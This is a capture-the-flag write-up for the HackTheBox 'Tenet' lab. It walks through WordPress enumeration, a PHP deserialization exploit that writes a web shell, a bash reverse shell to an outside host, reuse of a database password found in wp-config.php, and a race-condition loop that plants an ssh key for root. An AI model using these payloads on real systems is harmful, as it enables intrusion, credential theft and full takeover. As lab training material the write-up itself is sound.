HTB Tenet
Writeup for Tenet box on HackTheBox.eu
Initial Enumration
nmap -sC -sV -vv -oA tcp 10.129.80.224 -Pn
Found wordpress http://10.129.80.224/wordpress/
Seems like wordpress is set to resove the http://tenet.htb/
[+] protagonist
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://tenet.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] neil
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Found:
http://rotas.htb/sator.php
http://rotas.htb/users.txt
found http://10.129.88.28/sator.php.bak
which allows us to download the sourcecode
The exploit
<?php
class DatabaseExport
{
public $user_file = 'sh.php';
public $data = '<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>';
public function update_db()
{
echo '[+] Grabbing users from text file <br>';
$this-> data = '';
}
public function __destruct()
{
file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
echo '[+] Database updated <br>';
// echo 'Gotta get this working properly...';
}
}
$d = serialize(new DatabaseExport());
print_r($d);
The above file will generate a serialised version of DatabseExport class which we can send over to sator.php file
curl 'http://10.129.88.28/sator.php?aerop=O:14:"DatabaseExport":2:{s:9:"user_file";s:6:"sh.php";s:4:"data";s:88:"<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>";}'
The arepo parameter should be urlencoded but for readability it's not.
Get a reverse shell via the web shell uploaded initially:
curl 'http://10.129.88.28/sh.php' -d 's=/bin/bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.58/8443+0>%261"'
Enumeration
Mysql Credentials in wp-config.php
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'neil' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );
The same password works for ssh as neil
User enumeration
Privilege escalation
Read / Write race condition
cd /tmp
while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAA.... [email protected]" | tee ssh-*; done
Having the while loop run in the background we then run the command as sudo which will add out ssh key to the root user.